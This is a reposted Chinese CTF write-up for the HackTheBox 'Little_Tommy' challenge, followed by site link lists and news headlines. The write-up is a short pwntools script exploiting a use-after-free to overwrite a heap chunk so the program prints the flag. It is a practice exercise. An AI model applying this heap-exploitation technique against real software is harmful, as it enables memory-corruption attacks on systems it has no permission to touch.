HackTheBox-Little_Tommy - 代码天地

HackTheBox-Little_Tommy

其他 2020-09-18 12:19:11 阅读次数: 0

考察UAF漏洞的复写

#coding:utf-8
from pwn import *

'''
解题思路:
    输出flag条件为main_account+16=fuck,
    Add功能strdup可以向堆写入256字节,而
    且删除功能存在UAF,我们可以先创建一个
    chunk1然后free掉,再通过Add功能添加一
    个chunk2触发UAF，这样申请的chunk2,就
    是chunk1的内存段,32位内存地址占4字字
    节所以先填充16*4个A,然后只需要添加一
    个fuck即可
'''

p=process('little_tommy')
#p=remote('docker.hackthebox.eu',30993)

p.sendline('1')
p.sendline('AAAA')
p.sendline('BBBB')

p.sendline('3')

p.sendline('4')
p.sendline('AAAA'*16+'fuck')

p.sendline('5')

p.interactive()

猜你喜欢

转载自blog.csdn.net/qq_41743240/article/details/105847287

HackTheBox-Little_Tommy

【hackthebox】【Ypuffy】

Postman(HackTheBox)

Postman(HackTheBox)

Hackthebox -jeeves

可爱的Tommy（5分）——详解

【树形DP】【斜率优化】Tommy的结合

「CodePlus 2018 4 月赛」Tommy 的结合

Hackthebox--------irked

oscp——HackTheBox——Postman

hackthebox注册教程

Hackthebox walkthrough - Legacy

Hackthebox walkthrough-Lame

Hackthebox-Bart

hackthebox-chatterbox

hackthebox startpoint---Included

hackthebox免费注册

HTP(hackthebox) Soccer !!!

HackTheBox-LoveTok

a little sweet~

little error

Little Bird

little trick

Little Bishops

little difference

little定律

little tips

Little Flag

a little sad

A little love

今日推荐

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

报告：Django 仍然是 74% 开发者的首选

《2024 年一季度互联网投融资运行情况》研究报告

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

周排行

NEFU 117 素数个数的位数

Closest Common Ancestors (Lca,tarjan)

ELK部署

【转载】Hive笔记整理（三）

SQL语句（一）基本表的定义

关于Java web开发中的MySQL的事务语句

MFC创建自定义窗体

如何用一句话激怒程序员？

《逆袭大学》文摘——9.4 基础和应用的平衡中找到大学的节奏

【spring源码分析】@Value注解原理

每日归档

更多

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)